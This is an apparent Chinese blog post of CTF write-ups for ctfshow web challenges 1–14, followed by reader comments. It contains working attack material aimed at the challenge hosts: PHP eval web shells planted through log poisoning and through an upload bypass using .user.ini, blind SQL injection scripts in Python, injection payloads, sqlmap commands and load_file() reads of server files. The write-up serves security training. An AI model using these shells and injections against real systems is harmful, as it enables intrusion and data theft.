【原创】ctfshow—web(1—14)

web1

[huayang]web2

手注

sqlmap

web3

web4

payload
?url=/var/log/nginx/access.log

看日志

写入一句话

<?php @eval($_POST[b]);?>

web5

md5碰撞v1只能用字母v2只能用数字

ctype_alpha — 做纯字符检测

is_numeric() 函数用于检测变量是否为数字或数字字符串。

web6

盲猜空格绕过

加个注释就行

sqlmap

web7

相当于布尔盲注

import requests
urls = 'http://478951db-f91e-4a82-9941-c35a7c3ee800.chall.ctf.show/index.php?id=-1/**/or/**/'
true = ' turning'
name = ''
for number1 in range(50):  # 猜flag位数
    for number2 in range(44, 126):  # ASCII 字符0 ~ }
        # # 库
        # url = urls + 'ascii(substr(database()/**/from/**/%d/**/for/**/1))=%d' % (number1, number2)
        # #表
        # url = urls + 'ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%d/**/for/**/1))=%d' % (number1,number2)
        #字段
        # url = urls + 'ascii(substr((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name="flag"/**/limit/**/0,1),%d,1))=%d' % (number1,number2)
        #字段信息
        url = urls + 'ascii(substr((select/**/flag/**/from/**/flag)from/**/%d/**/for/**/1))=%d' % (number1,number2)
        response = requests.get(url)
        if true in response.text:
            name += chr(number2)  # chr()返回 ASCII 字符
            print(name, '...')
            break
print('\n>>>flag=', name, '<<<\n')

sqlmap

同上

web8

增加过滤逗号

import requests
urls = 'http://fdff3c6b-2123-42d2-9830-96145951c2ad.chall.ctf.show/index.php?id=-1/**/or/**/'
true = ' turning'
name = ''
for number1 in range(50):  # 猜flag位数
    for number2 in range(44, 126):  # ASCII 字符0 ~ }
        # # 库
        # url = urls + 'ascii(substr(database()/**/from/**/%d/**/for/**/1))=%d' % (number1, number2)
        # #表
        # url = urls + 'ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%d/**/for/**/1))=%d' % (number1,number2)
        #字段
        url = urls + 'ascii(substr((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name="flag"/**/limit/**/1/**/offset/**/0)from/**/%d/**/for/**/1))=%d' % (number1,number2)
        # #字段信息
        # url = urls + 'ascii(substr((select/**/flag/**/from/**/flag)from/**/%d/**/for/**/1))=%d' % (number1,number2)
        response = requests.get(url)
        if true in response.text:
            name += chr(number2)  # chr()返回 ASCII 字符
            print(name, '...')
            break
print('\n>>>flag=', name, '<<<\n')

web9

<?php
        $flag="";
		$password=$_POST['password'];
		if(strlen($password)>10){
			die("password error");
		}
		$sql="select * from user where username ='admin' and password ='".md5($password,true)."'";
		$result=mysqli_query($con,$sql);
			if(mysqli_num_rows($result)>0){
					while($row=mysqli_fetch_assoc($result)){
						 echo "登陆成功<br>";
						 echo $flag;
					 }
			}
    ?>

这题很难

payload:
ffifdyop

web10

点击取消


<?php
		$flag="";
        function replaceSpecialChar($strParam){
             $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i";
             return preg_replace($regex,"",$strParam);
        }
        if (!$con)
        {
            die('Could not connect: ' . mysqli_error());
        }
		if(strlen($username)!=strlen(replaceSpecialChar($username))){
			die("sql inject error");
		}
		if(strlen($password)!=strlen(replaceSpecialChar($password))){
			die("sql inject error");
		}
		$sql="select * from user where username = '$username'";
		$result=mysqli_query($con,$sql);
			if(mysqli_num_rows($result)>0){
					while($row=mysqli_fetch_assoc($result)){
						if($password==$row['password']){
							echo "登陆成功<br>";
							echo $flag;
						}
					 }
			}
    ?>
payload
'or/**/1=1/**/GROUP/**/BY/**/password/**/WITH/**/ROLLUP/**/LIMIT/**/1/**/OFFSET/**/1#

web11

密码为空,登录

删掉这个,再刷新

web12

?cmd=highlight_file('index.php');
?cmd=print_r(glob('*'));
?cmd=highlight_file('903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php');

web13

没扫出来

e24395a1-1b54-4b11-892e-cdd1b8fd55a0.chall.ctf.show/upload.php.bak

<?php
	header("content-type:text/html;charset=utf-8");
	$filename = $_FILES['file']['name'];
	$temp_name = $_FILES['file']['tmp_name'];
	$size = $_FILES['file']['size'];
	$error = $_FILES['file']['error'];
	$arr = pathinfo($filename);
	$ext_suffix = $arr['extension'];
	if ($size > 24){
		die("error file zise");
	}
	if (strlen($filename)>9){
		die("error file name");
	}
	if(strlen($ext_suffix)>3){
		die("error suffix");
	}
	if(preg_match("/php/i",$ext_suffix)){
		die("error suffix");
    }
    if(preg_match("/php/i"),$filename)){
        die("error file name");
    }
	if (move_uploaded_file($temp_name, './'.$filename)){
		echo "文件上传成功!";
	}else{
		echo "文件上传失败!";
	}
 ?>

写入一句话

因为不能连蚁剑所以写成get形式的

<?php eval($_GET['a']);

保存为a.txt并上传

再写一个.user.ini文件包含a.txt并上传

auto_prepend_file=a.txt

成功之后

?a=print_r(glob('*'));
?a=highlight_file('903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php');

web14

看不懂?

我也是,所以一个一个的去试

当c=3时出现如下画面

进去看看

盲猜注入

看看源代码发现过滤

加上脚本直接一梭子

py sqlmap.py -u http://217d37f2-fe0a-4aef-b39f-3380e4ff74d2.chall.ctf.show/here_1s_your_f1ag.php?query=1  --tamper=space2hash.py -dbs

py sqlmap.py -u http://217d37f2-fe0a-4aef-b39f-3380e4ff74d2.chall.ctf.show/here_1s_your_f1ag.php?query=1 --tamper=space2hash.py -D web --tables

字段名

py sqlmap.py -u http://217d37f2-fe0a-4aef-b39f-3380e4ff74d2.chall.ctf.show/here_1s_your_f1ag.php?query=1 --tamper=space2hash.py -D web -T content --columns

看这字段的信息就知道没有我们想要的flag

但还是打一下,万一呢

字段信息

py sqlmap.py -u http://217d37f2-fe0a-4aef-b39f-3380e4ff74d2.chall.ctf.show/here_1s_your_f1ag.php?query=1 --tamper=space2hash.py -D web -T content -C password --dump

果然

下面就看看羽师傅的wp

到这我们发现数据库中并没有我们想要的flag,但是有一条提示tell you a secret,secert has a secret… 所以很有可能flag在secret.php中,现在就有一个问题,我们怎么从数据库中查看文件内容呢,mysql提供了读取本地文件的函数load_file()
所以我们构造语句:

?query=-1/**/union/**/select/**/load_file('/var/www/html/secret.php')

得到如下内容

<?php
$url = 'here_1s_your_f1ag.php';
$file = '/tmp/gtf1y';
if(trim(@file_get_contents($file)) === 'ctf.show'){
	echo file_get_contents('/real_flag_is_here');
}')

也就是如果/tmp/gtf1y中的内容为ctf.show则输出/real_flag_is_here中的值,所以我们直接将/real_flag_is_here读取即可得到flag。

?query=-1/**/union/**/select/**/load_file('/real_flag_is_here')

[/huayang]

==>转载请注明来源哦<==

评论

  1. 华扬 博主
    9月前
    2021-3-19 16:44:01

    康康

  2. 宋清
    12月前
    2020-12-16 2:21:54

    啊好花

  3. 宋清
    12月前
    2020-12-16 2:20:48

    你好

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇